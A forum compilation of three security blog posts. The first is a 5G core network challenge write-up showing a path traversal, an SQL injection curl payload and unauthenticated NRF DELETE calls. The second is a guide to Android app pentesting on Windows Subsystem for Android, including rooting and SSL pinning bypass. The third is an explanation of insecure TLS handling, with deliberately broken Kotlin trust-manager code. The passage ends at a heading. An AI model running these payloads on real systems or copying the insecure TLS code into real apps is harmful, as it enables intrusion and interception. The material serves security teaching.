    |   2048 a3:8f:d9:************************************** (RSA)
    |   256 19:99:4d:*************************************** (ECDSA)
    |_  256 22:99:80:*************************************** (ED25519)
    25/tcp   filtered smtp
    3000/tcp open     ssl/http Node.js (Express middleware)
    | http-methods: 
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-title: EPC USER INTERFACE
    | ssl-cert: Subject: commonName=www.localhost.com/organizationName=c****core/stateOrProvinceName=ESPOO/countryName=FI
    | Issuer: commonName=www.localhost.com/organizationName=c***core/stateOrProvinceName=ESPOO/countryName=FI
    | Public Key type: rsa
    | Public Key bits: 2048
    | Signature Algorithm: sha256WithRSAEncryption
    | Not valid before: 2020-01-10T08:20:47
    | Not valid after:  2020-02-09T08:20:47
    | MD5:   3bea 59c5 d273 8e76 943e 5da1 ca0f 2040
    |_SHA-1: f5fc 11d5 489e b5a9 27e3 66b7 386e 05e0 5b79 78ea
    |_ssl-date: TLS randomness does not represent time
    | tls-alpn: 
    |_  http/1.1
    | tls-nextprotoneg: 
    |   http/1.1
    |_  http/1.0
    5050/tcp open     mmcc?
    | fingerprint-strings: 
    |   FourOhFourRequest: 
    |     HTTP/1.0 404 NOT FOUND
    |     Connection: close
    |     Content-Length: 232
    |     Content-Type: text/html; charset=utf-8
    |     Date: Mon, 14 Jun 2021 15:18:55 GMT
    |     Server: waitress
    |     <!DOCTYP#fig:c****core1#fig:c****core1E HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
    |     <title>404 Not Found</title>
    |     <h1>Not Found</h1>
    |     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
    |   GetRequest: 
    |     HTTP/1.0 200 OK
    |     Connection: close
    |     Content-Length: 2407
    |     Content-Type: text/html; charset=utf-8
    [...]
    
    Heterodyne process
    Core network Management console exposed on TCP port 3000
    Heterodyne process
    Management interface exposed on TCP port 5050 on 195.148.***.***

    Finding these interfaces, our team proceeded by hunting for vulnerabilities on web applications.

     

    Web vulnerabilities in core's GUI

    Traversal

    By bruteforcing directories in exposed web interfaces, it was found that at least one was vulnerable to a path traversal, giving us access to the Core Network Management Interface as follows:

    Heterodyne process
    Directory traversal in Core Network's console

    With such access, we could directly look for secret likes preshared key Ki used to derive session keys for each subscriber:

    Heterodyne process
    Secret exposed in the exploited interface

    In that context, keys were just duplicated for the challenge, as it is more convenient to develop a batch of ISIM cards with the exact same key. But imagine if those keys were actually used in real-world context, an attacker would be able to use these secrets and trap the victims in fake gNB, as the BTS, or (e/g)NodeB would be able to authenticate itself with that key. Indeed, if we are considering using an srsRAN for 4G and 5G NSA, or an Amarisoft gNB and provide the key of each user the following way, we will be able to spy on communications being close to targets.

    Following this traversal vulnerability, we have also found another web vulnerability that allowed us to gain more information.

    Leaked password

    Continuing our investigation, we have been able to retrieve accesses to the MySQL database:

    Heterodyne process
    Leaked password in the core network web console

    Unfortunately for us, this database was not directly exposed.

    SQL injection

    Indeed, by inspecting the JavaScript file routes/routes.js of the web user interface, it was shown that some parameterized SQL query were used for most functions. However, among all options, the /operator endpoint was clearly an option:

    check('mcc').isInt({ min: 100, max: 999 }).withMessage('Error! mcc should be integer value!').trim().escape(),
    check('mnc').isLength({ min: 1, max: 3 }).withMessage('Error! Mnc should not be empty !').trim().escape(),
    check('op').isHexadecimal().withMessage('Error! The op field requires hexadecimal value!').trim().escape(),
    check('amf').isHexadecimal().withMessage('Error! The amf field requires hexadecimal value!').trim().escape(),
    check('name').isLength({ min: 1 }).withMessage('Error! The name field requires alphanumeric characters!').trim()
    ... snipped ...
    mysql_op = "INSERT INTO operators (mcc,mnc,op,amf,name) values ('" + req.body.mcc + "','" + req.body.mnc + "',UNHEX('" + req.body.op + "'),UNHEX('" + req.body.amf + "'),'" + req.body.name + "')";
    db.query(mysql_op, function (err, op_data) {
    

    Testing this option, we could observe that it was possible to save a result into an inserted column using the following query:

    $ curl -L -k  'https://195.148.****:3000/operator' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
    ' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Referer: https://195.148.******:3000/display_operator' -H 'DNT: 1' -H 'Connection: keep-alive
    ' -H 'Cookie: connect.sid=s%3A77zZAllwXzI3OMKe6gK5b1iy***********************************************************'  -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: https://19
    5.*******:3000' --data-raw 'mcc=901&mnc=01&op=f964ba947*********************&amf=8000&name=a%27%29%3B%20SELECT%20COUNT%28%2A%29%20INTO%20%40v1%20FROM%20five_g_service_data%3B%20UPDAT
    E%20operators%20SET%20operators.name%20%3D%20LEFT%28%40v1%2C%2020%29%20WHERE%20operators.mcc%20%3D%20%27901%27%20%23%20'
    

    The query resulted as follows:

    Heterodyne process
    SQL injection in the core network management interface

    However, it was also observed that we were limited to 20 characters maximum with the name field which was the bigger type in this case. We could retrieve the result in blind using timing functions, but it was in fact time-consuming. So the best option was to automate it, but also keep a clean page for other participants by saving results discreetly in the name field as possible.

    Running on time, our black-box approach needed to finish and we used SSH tunnels provided by organizers to continue inside the "Operator's Network".

     

    Interaction with NRF

    Inside the Operator's network, we were able to scan and discover a few other systems and particularly some HTTPS endpoints that were revealed to be an NRF (Network Function Repository Function) endpoints:

    $ curl -k -X GET "https://10.33.*****:9090/bootstrapping" -H "accept: application/3gppHal+json"
    {"status":"OPERATIVE","_links":{"authorize":{"href":"https://10.33.******:9090/oauth2/token"},"discover":{"href":"https://10.33.******:9090/nnrf-disc/v1/nf-instances"},"manage":{"href":"https://10.33.******:9090/v1/nf-instances"},"self":{"href":"https://10.33.1.12:9090/bootstrapping"},"subscribe":{"href":"https://10.33.1.12:9090/nnrf-nfm/v1/subscriptions"}}}
    

    While this method returns API endpoints for different kindis of tasks. After that, we can inspect further this API, like using the nf-instances endpoints by example:

    $ curl -k -X GET "https://10.33.*****:9090/nnrf-disc/v1/nf-instances?target-nf-type=NRF&requester-nf-type=NRF"
    {"validityPeriod":120,"nfInstances":[{"nfInstanceId":"8cfcf12f-c78f-******************","nfType":"NRF","nfStatus":"REGISTERED","nfInstanceName":"nrf-cumu","plmnList":[{"mcc":"244","mnc":"53"}],"ipv4Addresses":["10.33.*******:9090"],"allowedPlmns":[{"mcc":"244","mnc":"53"}],"allowedNfTypes":["NWDAF","SMF","NRF","UDM","AMF","AUSF","NEF","PCF","SMSF","NSSF","UDR","LMF","GMLC","5G_EIR","SEPP","UPF","N3IWF","AF","UDSF","BSF","CHF","PCSCF","CBCF","HSS","SORAF","SPAF","MME","SCSAS","SCEF","SCP"],"nfServiceList":{"0":{"serviceInstanceId":"0","serviceName":"nnrf-disc","versions":[{"apiVersionInUri":"v1","apiFullVersion":"1.0.0"}],"scheme":"https","nfServiceStatus":"REGISTERED","ipEndPoints":[{"ipv4Address":"10.33.1.12","ipv6Address":"","transport":"TCP","port":9090}],"allowedPlmns":[{"mcc":"244","mnc":"53"}]},"1":{"serviceInstanceId":"1","serviceName":"nnrf-nfm","versions":[{"apiVersionInUri":"v1","apiFullVersion":"1.0.0"}],"scheme":"https","nfServiceStatus":"REGISTERED","ipEndPoints":[{"ipv4Address":"10.33.****","ipv6Address":"","transport":"TCP","port":9090}],"allowedPlmns":[{"mcc":"244","mnc":"53"}]}}}]}
    

    It should be noted that all these queries were performed without any authentication. Nevertheless, a good understanding of the 3GPP OpenAPI is required if we do not want to drown down looking at all the YAML files. Luckily for us at that time, there was some project like 5GC APIs which allowed us to save plenty of time.

    Heterodyne process
    OpenAPI Descriptions of 3GPP 5G APIs (Release 17)

    A project like 5GC API allows us to quickly construct queries, but these queries needed them to be converted to Burp Suite if we wanted to automate some work, but also record behaviours more narrowly.

    So after the challenge, a Burp Suite extension was also released by Penthertz to allow future telecom pentesters to directly check the NRF interface. This extension is officially available in Burp's store.

    Heterodyne process
    Parsed OpenAPI YAML in Burp Suite

    And by playing with the different endpoints, we have been able to reach the goal of the challenge by interrupting the traffic by deleting the NF instances created for the challenge:

    $ curl -k -X DELETE "https://10.33.*****:9090/nnrf-nfm/v1/nf-instances/84694f7d-7f76-44af************************" -H  "accept: */*" # first API call
    $ curl -k -X DELETE "https://10.33.*****:9090/nnrf-nfm/v1/nf-instances/84694f7d-7f76-44a*****************" -H  "accept: */*" # second API call
    {"title":"Data not found","status":404,"cause":"DATA_NOT_FOUND"}
    

    But abusing the PUT web verb, we were also able to perform a lot of alterations and hijack clients, or also create are own instances for the purpose:

    Heterodyne process
    Result of a fake instance create in the NRF

    The risks of having an NRF interface exposed to an attacker, and without authentication can have terrible consequence as each function is responsible for a task, and hijacking these functions would allow an attacker to be persistent and steal secrets, monitor communications, and pivot to sensitive slices easily to gain access to other infrastructures.

    For more information regarding possible attacks with the NRF, but also the PFCP protocol, Positive Technologies also released a nice report resuming attacks that can be possible in 5G SA cores.

     

    Go further on leaked binaries

    During the intrusion, we have also been able to leak the binaries, but looking at these directly showed that reversing will not be very easy:

    $ file *
    amf:             ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=08f94b071650da3554e5b95f70e6ba3850ce6318, with debug_info, not stripped
    amf_config.json: ASCII text
    cert:            directory
    config.yml:      ASCII text
    go-upf:          ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, Go BuildID=ckq7fZLxgmR6uenXU4JZ/KAXEUT7OwQ1xBaGVgD_7/ooHH5veYSKyfB5KX-Pjl/gKzOtxFRdL-lJs_6ac2l, stripped
    hackathon_tckn:  data
    nrf:             ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, Go BuildID=uX08ekosFePKbnLnF0QB/JUYvVUCmbTHKFc0ERXZw/ZsdPpGDbVPLe-CI-lzfU/KT8XrjYx8vFbsGgXj9wS, not stripped
    nrf-config.yml:  ASCII text
    private.key:     PEM RSA private key
    public.crt:      PEM certificate
    pub.pem:         ASCII text
    smf:             ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=00c4f4b9e2b8c364e8d6598336d1003324ed76c9, with debug_info, not stripped
    smf_config.json: JSON data
    

    Indeed, interesting binaries seem to be written in Go language.

    Apart from looking at string references, we did not have the time to go further on the binary, but it would be interesting to look at these at least using a network fuzzer.

    To also assist on reversing those binaries, a Ghidra plugin is available for x86_64 architectures:

    Heterodyne process
    Ghidra Go Tools Plugin within `SearchNFInstances` decompiled function

    Even if the analysis would be painful, the plugin helps a lot retrieving function names, arguments in calls, and return types, which is also good for fuzzing purposes. We will probably cover it in another blog post.

     

    Conclusion

    5G-NR SA is expected soon to be released to the public, and we saw that a new network protocol in HTTP/2 will be used for this purpose. As a fact, it means that a new form of attack will also be introduced in the telecom industry, that was for the moment only mostly dealing with network attacks in the core, but will also have to be aware of potential web vulnerabilities in the future. We showed thanks to the 5G Cybersecurity event, that even 5G-NR SA core network can be exposed and easily attacked depending on exposed services, and the implementation of services and web applications. Indeed, the NRF interface was not directly exposed in our cases, and it would be a long road to get access to this interface with the vulnerable core network interface exposed.

    Penthertz offers

    Trainings

    Starting 2022, Penthertz will offer 5G-NR and 5GNC security training at Advanced Security Training as 5G Mobile Device Hacking.

    This training will be an opportunity to attendees to touch a 5G-NR NSA and SA testbed in remote, but also an opportunity to play with a 5G Core Network.

    For more information: click here

    Consulting

    Penthertz has more than 10 years experience in radio including mobile security since 2010, and provides consultancy services to find weak points in radio communications and network. To get more information, please contact us using this link.

     

    Sursa: https://penthertz.com/blog/Intruding-5G-core-networks-from-outside-and_inside.html

  9. Android Application Testing Using Windows 11 and Windows Subsystem for Android

    Reading time ~17 min
    Posted by Michael Higgo on 16 November 2021

    With the release of windows 11, Microsoft announced the Windows Subsystem for Android or WSA. This following their previous release, Windows Subsystem for Linux or WSL. These enable you to run a virtual Linux or Android environment directly on your Windows Operating System, without the prerequisite compatibility layer provided by third-party software. In this post I’ll show you how to use WSA for Android mobile application pentesting, such that you can perform all of the usual steps using only Windows, with no physical Android device or emulator needed.

    Experience

    The WSA experience is great; when installing applications within WSA, they are automatically available to the Windows host. Likewise, all files and resources from the Windows host can interact with the Android Subsystem. In the past, Android emulation has been notoriously tricky. Third party applications always required you to place your trust somewhere else, and have always been slow and resource heavy.

    This got me thinking about how WSA could potentially be used for Android security testing, without the need for an Android device. In order for this to be successful, I would need to be able to install, patch, and run Android applications, as well as intercept traffic… in same manner as on a physical Android device. This would serve two purposes – the first being removing the need for a potentially expensive device, and secondly creating a uniform and reproducible testing platform.

    Step 1 – Prerequisite Applications

    The following applications are often needed to conduct Android application security testing. Not all of them are not necessary for WSA itself, but are useful for Android testing and connectivity in general.

    • Android Studio is a must for any Android testing. It provides a debugger, and a way to view the components of an APK in an easily digestible format.
    • We will be using Objection to patch APKs prior to installation as well as to perform some instrumentation of the target application. Objection has various prerequisites which are mentioned in the Wiki and should be installed as well.
    • Windows 11 – with the virtual machine platform enabled in the Windows Features settings.
    • Lastly, we’ll be needing Python to run objection.

    On my system, I added the paths to all of the above-mentioned tools to my Windows environment variables so that they can be run from any directory. I recommend this for a smoother experience. It can be done by clicking Start, and then typing environmental variables, and editing the system-wide variables.

    Env_variables-1-1024x445.png Adding all the previously installed tools to your PATH environmental variable

    Step 2 – Installation

    Microsoft has detailed instructions on how to install “base” WSA here.

    At the time of writing this post, in order to install WSA directly from the Microsoft Store, you need to be part of the Windows Insider Program, and running on the Beta channel. This will change in future releases. It is also currently only possible to install a small subset of applications from the Amazon Appstore, which is installed from the Microsoft Store here – it’s just stores all the way down!

    These limitations don’t help us when a client sends an APK or AAB bundle, so we need a way to side load applications, the same as we would on a regular physical device. Thankfully this is made possible following my second installation method below.

    Installation method 1 – Limited WSA

    For demonstration purposes, let’s see how to install Microsoft’s limited WSA distributed through the insider program. We won’t modify it to allow Google Play Services to work, or to side load applications, that’s done in the next section, and you’ll have to uninstall this. So this is really just to show the difference. The MSIXBundle that you will get when signing up for the Insiders Program file can be discovered using this service. This site is a link aggregator for downloading directly from the Microsoft store. Credits to RG_Adguard for this.

    Within the URL field, enter the following (which is the URL for the Amazon Appstore):

    https://www.microsoft.com/store/productId/9P3395VX91NR

    Then select the SLOW channel and hit search. This should reveal the URL to download the WSA application directly from Microsoft.

    Download_msix-1.png Make sure to select the SLOW channel
    Download_msix_2-1-1024x133.png Select the 1.2GB MSIXbundle file

    Once downloaded, open Windows Terminal as Administrator and run the following:

    Add-AppxPackage -Path "C:\path\to\wsa.msixbundle"

    This should then give you the Windows Subsystem for Android in your Windows start menu.

    WSA_start.png WSA Settings should now be available in your start menu.

    Once the application is open, you’ll see a couple of options. The first is choosing to have the subsystem resources available as needed, or continuously available. This is a personal preference. I chose to have them running continuously, as I have resources to spare.

    The second option is not personal preference. You MUST enable developer mode within WSA, or you will not be able to connect via the Android Debug Bridge or ADB.

    WSA_enable-1-1024x459.png Ensure Developer Mode is enabled.

    You will see that you currently have no IP assigned, and this is expected. Even though the WSA settings are open, WSA itself is not necessarily running.

    WSA_No_IP-1-1024x313.png IP Address is unavailable currently.

    In order to actually start WSA, you need to click the open icon next to the FILES option, which will present you with a very basic Android file browser GUI.

    WSA_files-1.png
    WSA_Starting.png
    WSA_Files_open.png This is the screen you’ll see once the subsystem is running, and the “device” has started.

    At this point you’ll have a basic WSA installation up and running. However, it is limited to the Amazon app store, and that is not very useful for what we want to do!

    Installation method 2 – Google Play enabled WSA with root

    Let’s redo the installation step-by-step using a method which provides more functionality, such as the ability to install applications directly from Google Play within Windows, the ability to sideload applications, and the ability to Root your WSA “device”.

    Firstly, if you were previously playing around with WSA, or you followed my initial method, you’re going to need to uninstall all traces of WSA from your system.

    Next, Open your Windows settings and enable Developer Mode within Windows itself, as opposed to within WSA (although both are needed). This will allow you to install third party application bundles from outside of the Microsoft Store.

    Developer_Settings-2.png

    Next you’ll need to create and download a patched WSA installer and platform tools. This can be done by following the description on the Github repo here. In essence you will fork the repo, and specify the version of the open source Google Play Store you want by name, based on OpenGApps. A small selection of the different variants descriptions are below:

    • Pico: This package is designed for users who want the absolute minimum GApps installation available.
    • Nano: This package is designed for users who want the smallest Google footprint possible while still enjoying native “Okay Google” and Google Search support.
    • Stock: This package includes all the Google Apps that come standard on Pixel smartphones.
    fork.png The forked repo on my gitHub

    Once forked, click Actions, and click on the Build WSA workflow, specifying the OpenGApps version you selected from above. In summary, the workflow will:

    • Download WSA from the Microsoft Store (via RD-Adguard)
    • Download Magisk from the Canary branch on the Magisk repo
    • Download your specified version of OpenGApps
    • Unzip the OpenGApps
    • Mount all images
    • Integrate OpenGApps
    • Unmount all images
    • Shrink the resultant image
    • Integrate ADB
    • Package everything into the final zip file.

    You can see this workflow in action in this file.

    Build-1024x514.png Select the GApps version in the build options on the right hand side
    Build-complete.png The WSA Build is complete
    WSA_gapps.png The resultant file size will vary greatly based on the selection of GApps

    You will see a download link included for a specific version of Magisk in the build options, which currently works 100% with WSA. Magisk is an application used to Root android devices. Rooting is NOT necessary for patching or intercepting to work, but does provide extra functionality which may be useful to you.

    Extract the resultant WSA-with-magisk-GApps.zip contents and open a Terminal window as Admin within the unzipped directory. Then run:

    Add-AppxPackage -Register .\AppManifest.xml
    Install_new-1-1024x179.png

    You can now re-open windows Subsystem for Android from the Windows Start menu. You’ll need to enable Developer Mode from within the WSA settings, and click on the open files button, just as before.

    Back in the terminal, we can now run ADB (either directly from the platform tools directory, or from any directory if you modified your environment variables). Typing ADB devices will give a list of all the current available devices which will initially be empty. We’ll fix that in a moment.

    ADB_devices.png

    Looking at the WSA settings, an IP address should now be configured.

    IP_address-1.png

    We can connect to this “device” using ADB connect `IP`. We can then re-list the devices and confirm we have connectivity.

    ADB_de-1.png

    Installing applications is as simple as ADB install ‘APK Name’. We will be installing Magisk in this manner with ADB install magisk.apk. Once installed, click on Start and search for Magisk. As WSA shares resources with Windows, Magisk can be opened from the Start menu as if it is installed in windows directly, however it is running seamlessly under WSA.

    Magisk_windows.png
    Magisk_settings.png

    In the terminal, type ADB shell to gain access to the WSA “device”. We can confirm the current user with whoami.

    ADB_shell.png

    Typing su to become root will result in a pop-up within Magisk, asking to allow root access. Once allowed, the SuperUser tab within Magisk will show that we have granted root access within the ADB shell.

    ADB_SuperUser-1.png

    We can confirm we have rooted the device with whoami.

    ADB_SU-1.png

    From this point, we have full read/write access to the WSA filesystem.

    Step 3 – Objection

    Objection works in much the same way from this point. Simply running objection patchapk -s 'sourceapk' will allow ADB to determine the device architecture the same way as it would from a mobile device via USB. I will be using the “Purposefully Insecure and Vulnerable Android Application” (PIVAA) for demonstration purposes.

    Objection_patch-1-1024x189.png Objection successfully determined the x86_64 architecture, and patched the application accordingly.

    Once patched, install the application with

    adb install .\pivaa.objection.apk

    As before, it is now available directly within Windows. However, starting the application will cause it to “pause” until we use Objection explore to hook into the Frida server.

    PIVAA.png
    Objection_explore-1-1024x282.png Objection successfully hooks into the Frida server

    You will see this device show up as a “Pixel 5”, which seems to be the archetype for the virtual device, and may change in future updates. It’s important to note that no USB, nor a physical Pixel 5 are involved.

    I now had a working WSA installation, a rooted device, patching with Objection, and hooking into running patched applications with Objection. The main question that I was faced with at this stage was how to do the final step – intercepting traffic with Burp Suite.

    Step 4 – Intercept with Burpsuite

    As I had no way of seeing the virtual network settings or installing a certificate authority on the device, I decided to try installing an Android Launcher. A launcher is similar to a desktop environment on a Linux distribution, and is what you see when you unlock your physical android device. Some popular ones include Niagara, Nova, Lawnchair, and Stock launchers from the likes of Google and Samsung.

    After trying multiple launchers, third party settings applications, and Windows specific proxy applications, I had the idea that the launcher with the highest probability of being compatible was the Microsoft Launcher. You can install it directly onto the device by using OpenGapps and using the official play store link. I opted to side load the APK from here (however multiple other APK mirroring sites exist, so use your preferred one), and installed it with adb install. This gave me exactly what I was looking for, a settings application.

    Settings_microsoft_launcher-1.png Other applications can be opened from the launcher directly, as opposed to the Windows Start menu
    Settings_android-1.png

    Within the Network and Internet settings, I finally had a Virtual WiFi adapter, which I was able to set proxies for.

    Virt_Wifi.png

    When in the VirtWiFi settings, I was able to select the Advanced options to install certificates. Knowing this, I generated a certificate from Burp Suite and moved it to the “device” using:

    adb push .\burpwsa.cer /storage/emulated/0/Download

    I knew I had access to all folders after rooting with Magisk, but the Downloads folder was visible within the files application of WSA itself, so I selected this as the destination directory.

    BurpWSA.png

    Installing the certificate needed to be done through the settings however.

    Install_Certs-1.png Click on advanced – Install certificates.
    Install_certs_2-1.png Install_burpWSA.png

    Once installed, I set my proxy listener in Burp to that of my host Ethernet IP, and a port of my choosing as per usual.

    Burp_proxy-1.png

    Within the VirtWifi I edited the proxy to have the same settings.

    Virt_proxy-1.png Click the pencil on the top right to edit the config.
    Virt_proxy3-1.png Match the proxy settings to Burp Suite

    Now when running the PIVAA application, hook into it with Objection as before, however this time specifying Android SSLPinning Disable as the startup command, I was able to intercept the traffic from WSA.

    android_ssl_disable-1-1024x436.png An exception was thrown for TrustManager, indicating the SSLpinning was being bypassed
    Intercept4-1.png Specifying Sensepost.com within the application.
    intercept2-1024x677.png

    Summary

    We can see that using the initial method, we’re severely limited to what we can do, but there’s always workarounds and more we can do!

    Digging a bit deeper, we’re able to install WSA without using the Microsoft store, and without being on the Windows 11 Beta program, but that wasn’t quite where we needed to be.

    Taking it one step further allows us to install any application we want, and obtain root privileges on WSA itself, which is a critical step in terms of security testing Android.

    The final step from here, which undoubtedly took the longest, was figuring out how to intercept traffic from this virtual device in Burpsuite, in order to perform dynamic testing, and modify the data in transit, but with this done, there is now no longer a need for a physical android device to perform security testing on Android applications.

    Please feel free to reach out to me with any questions you may have. This is still a new and evolving technology, and I hope to add to this as new methods emerge.

     

    Sursa: https://sensepost.com/blog/2021/android-application-testing-using-windows-11-and-windows-subsystem-for-android/

  10. Insecure TLS Certificate Checking in Android Apps

     
    Written by: Samuel Hopstock - Software Engineer

    Since launching Guardsquare’s mobile application security testing tool AppSweep at the beginning of August, we have been monitoring the types of security issues found in Android apps. One of the predominant issue classes we saw were apps containing code that led to an insecure configuration of HTTPS connections.

    This post will explain the technical background of why these configurations are insecure, and how attackers can take advantage of these situations. If you would like to learn more about how to properly secure HTTPS connections in Android apps, keep an eye out for the follow up post.

    HTTPS-Related Findings in AppSweep

    With HTTPS communication, the actual traffic is encrypted with the Transport Layer Security (TLS) protocol, which bases its trust model on the certificate presented by the web server. In order for the connection to be secure, the client needs to properly examine this server certificate and determine whether it is trustworthy.

    After several months of Android application scans, we’ve noticed several common issues with certificate verification in more than 33% of all scanned builds:

    1. We discovered that 9% of all builds submitted to AppSweep instructed WebView objects to ignore any TLS-related errors during connection establishment. This is insecure, as TLS errors are usually caused by invalid certificates, so ignoring them ultimately undermines the entire certificate checking process.
       
    2. 25% of the apps scanned have a malfunctioning custom implementation of the X509TrustManager class. The X509TrustManager class is responsible for the validation of TLS certificate chains, so if its implementation is flawed, the entire security concept of the protocol is disabled.
       
    3. Finally, 15% of the scanned apps were configured so that the general authenticity of the certificate was verified, but the last step of verifying the validity of the certificate’s host name was skipped. With this configuration, an attacker could present a valid certificate for malicious.com, even though the user was trying to connect to google.com.

    Causes of Insecure TLS Configurations

    As our scan results indicate, developers frequently override the secure default implementations for validating TLS certificates provided by the Android framework. A very prominent concept in the field of cryptography and IT security is to rely on well-known and tested existing algorithms and libraries, and to not “roll your own” crypto. This naturally applies to validating TLS certificates correctly as well.

    This raises the question of why developers want to override the defaults anyway, and risk ending up with insecure implementations. Analyzing StackOverflow questions and publicly available blog posts gave us some insight into the reasons, which seem twofold:

    1. Some apps need to establish secure connections to servers that use certificates issued by custom certificate authorities (CAs)
    2. OWASP strongly recommends using certificate pinning to secure communication with backend servers in accordance with security best practices, but implementing this yourself is a potentially error-prone task

    We will now dive deeper into these two reasons, exploring how they might result in insecure implementations and why developers include them in their apps.

    Custom Certificate Authorities

    Many developers want to create an app that has to communicate with a backend server using a certificate issued by a custom certificate authority. Certificate authorities (CAs) are a fundamental part of the TLS certificate system: By default, browsers and operating systems only trust connections to servers whose certificates have been issued by a well-known CA. In our example case, where the certificate was issued by an unknown custom CA, the connection attempt is aborted with an exception.

    Developers often consult sites like StackOverflow when dealing with exceptions they do not know how to deal with. But these posts often get answered with workarounds that introduce security issues such as disabling the default SSL certificate checking mechanisms in part or even completely. Unfortunately, many developers use such solutions without thoroughly checking their validity, resulting in the use of vulnerable coding patterns that lead to the AppSweep findings mentioned above.

    Certificate Pinning

    Another reason why developers might resort to custom TLS configurations actually stems from the opposite desire. Malicious actors could add an attacker-controlled certificate authority to the default trust store, which can then be used to issue forged certificates for any server. You can protect your app from such a scenario by using certificate pinning. If you are interested in learning more about this technique, check out our prior blog post on SSL certificate pinning and its limitations.

    Certificate pinning is good practice from a security point of view, but unfortunately many developers try to implement this pinning code themselves. This is a potentially error-prone task, resulting in modifications to the default certificate checking implementation that might ultimately make the result less secure than before.

    Demonstrating the Risk of Broken TLS Handling

    We now know about three frequently occurring types of incorrect TLS handling in Android applications, and we understand the developer's motivation for custom implementations. But we still haven’t discussed the actual risk that such a broken implementation introduces for the end-user and the developer.

    To dive deeper into this, we’ve constructed a containerized demo environment enabling us to easily mimic the different scenarios and demonstrate their consequences in practice. On our GitHub repository, you can find all the files you need to execute the demos, for a hands-on experience while following the next sections.

    In the next two sections, we’ll briefly describe our demo setup, after which we will use it to demonstrate three real life scenarios.

    Demo Environment Setup

    Our environment has 3 containers as shown in Figure 1, mimicking the client (mobile app), back-end & malicious entity.

    • The first container in the setup is a web server that offers an HTML web page when clients connect to it. This data that is transferred to the user is considered sensitive, and thus offered via HTTPS. The catch is that it uses a certificate issued by a custom certificate authority, mimicking the scenario we’ve observed in the previously mentioned application scans.
    • The second container contains an Android emulator running a sample app that wants to retrieve the data offered by the web server and display it in a WebView. In order to establish a connection despite the custom server certificate, it showcases different custom certificate handling implementations in each tab.
    • The third container simulates a malicious actor that happens to be on the same network as the Android device. This situation may arise e.g. in public WiFi hotspots that can frequently be found in cafes and other public places.

    1__GRAPHICS_Accepting-custom-TLS-certificates-in-AndroidFigure 1: Demo environment setup

    Intercepting HTTPS Traffic

    The final part of the setup is actually having the malicious container intercept the secure channel between the client and the server, and optionally modifying its content. To achieve this we’ll use two techniques sequentially:

    • ARP Spoofing: This makes the Android emulator believe that the malicious container is in fact the web server and analogously tells the web server that it is the Android emulator. By doing so, all network packets that are to be exchanged between the two other containers are delivered to the malicious container instead.

    2a__GRAPHICS_Accepting-custom-TLS-certificates-in-AndroidFigure 2: ARP spoofing

    • Proxying: Once the packets are being re-routed, the attacker becomes a man-in-the-middle (MITM) entity that takes care of forwarding the packets to the correct recipient. Like this, they have full control over the communication without any of the two other parties noticing the presence of a proxy.

    2b__GRAPHICS_Accepting-custom-TLS-certificates-in-AndroidFigure 3: Attacker acting like a proxy

    The following three experiments showcase how this situation will look in practice, each showing a different one of the previously mentioned vulnerable HTTPS configurations in Android apps.

    WebView Ignores All SSL Errors

    The WebView widget is a popular choice for situations where HTML data received from a web server should be displayed to the user. The code snippet below shows how the WebView’sWebViewClientimplementation is substituted by a custom client that modifies the callback responsible for SSL error handling. This method is invoked when Android doesn’t trust the TLS certificates provided by the target server, giving the implementer the choice to eitherproceed()with the connection orcancel()it.

    Thus, when your app needs to deal with a certificate that is untrusted by the operating system, overriding this error handler allows deviating from the default behavior. Ignoring the error and proceeding with every connection is a frequently proposed quick fix suggested in various places, such as the previously linked StackOverflow thread. As a result, the entire certificate verification process is nullified.

    binding.webview.webViewClient = object : WebViewClient() {
        override fun onReceivedSslError(
            view: WebView?,
            handler: SslErrorHandler?,
            error: SslError?
        ) {
            handler?.proceed()
        }
    }

    Now let’s have a look at the video below: When the MITM proxy is activated by running thestart.shscript, you can see that further HTTPS requests suddenly result in a very different text being displayed in the WebView. This is a result of the traffic manipulation executed by the malicious actor. The user has no way of finding out about the dangerous situation. The transmitted password is intercepted by the MITM entity and they can use it however they like, while the user receives the modified password without any idea that it was modified.

    insecure-webview

    Malfunctioning X509TrustManager Implementations

    If any communication with a server should happen securely over HTTPS without a WebView, the usual way of establishing the connection is using theHttpsURLConnectionclass. Similar to the WebView connection client, this approach also verifies the server’s TLS certificate based on the certificate authorities known to Android. In our case, the certificate would not be accepted by default, as it has been issued by a custom certificate authority. This results in an SSLException being thrown when attempting to start the connection.

    Thus, similarly to how theWebViewClientimplementation can be overridden, we can instruct theHttpsURLConnectionto use a customX509TrustManagerimplementation that is responsible for verifying the TLS certificate trustworthiness:

    val insecureTrustManager = object : X509TrustManager {
        override fun checkClientTrusted(
            chain: Array?,
            authType: String?
        ) {
            // do nothing
        }
    
        override fun checkServerTrusted(
            chain: Array?,
            authType: String?
        ) {
            // do nothing
        }
    
        override fun getAcceptedIssuers() = null
    }
    val context = SSLContext.getInstance("TLSv1.3")
    context.init(null, arrayOf(insecureTrustManager), SecureRandom())
    
    val url = URL("https://www.mitmtest.com")
    val connection = url.openConnection() as HttpsURLConnection
    connection.sslSocketFactory = context.socketFactory

    The easiest but most insecure solution to get rid of the SSLException, often proposed publicly, is to use the implementation shown above, which simply does nothing. This is equivalent to deeming every server as trustworthy. The correct behavior would be to throw an exception in case an invalid certificate is presented. But if the app doesn’t do this, the actual certificate checking gets neglected. Attackers can then freely intercept and modify the transferred data without any problems, as shown in the video. Of course, you can also create a secure trust manager implementation that accepts certificates issued by a custom CA, but this is a topic we will explore in the next blog post.

    insecure-trustmanager

    Disabled Host Name Checks

